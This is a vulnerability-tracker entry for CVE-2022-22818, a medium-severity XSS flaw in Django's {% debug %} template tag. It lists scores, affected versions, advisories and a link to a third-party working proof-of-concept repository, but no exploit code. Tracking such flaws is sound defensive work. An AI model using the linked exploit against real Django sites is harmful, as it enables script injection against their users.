CVE-2022-22818

MEDIUM

Django < 2.2.27 - XSS

Title source: rule

Description

The {% debug %} template tag in Django 2.2 before 2.2.27, 3.2 before 3.2.12, and 4.0 before 4.0.2 does not properly encode the current context. This may lead to XSS.

Exploits (1)

nomisec WORKING POC 3 stars

by Prikalel · poc

https://github.com/Prikalel/django-xss-example

View Code ZIP pw:eip

References (6)

[Patch, Third Party Advisory] https://docs.djangoproject.com/en/4.0/releases/security/

[Mailing List] https://groups.google.com/forum/#%21forum/django-announce

[Third Party Advisory] https://security.netapp.com/advisory/ntap-20220221-0003/

[Third Party Advisory] https://www.debian.org/security/2022/dsa-5254

[Exploit, Patch, Third Party Advisory] https://www.djangoproject.com/weblog/2022/feb/01/security-releases/

[Mailing List, Third Party Advisory] https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/B4SQG2EAF4WCI2SLRL6XRDJ3RPK3ZRDV/

Scores

CVSS v3 6.1

EPSS 0.0101

EPSS Percentile 77.2%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Details

CWE

CWE-79

Status published

Products (4)

debian/debian_linux 11.0

djangoproject/django 2.2 - 2.2.27

fedoraproject/fedora 35

pypi/Django 2.2 - 2.2.27PyPI

Published Feb 03, 2022

Tracked Since Feb 18, 2026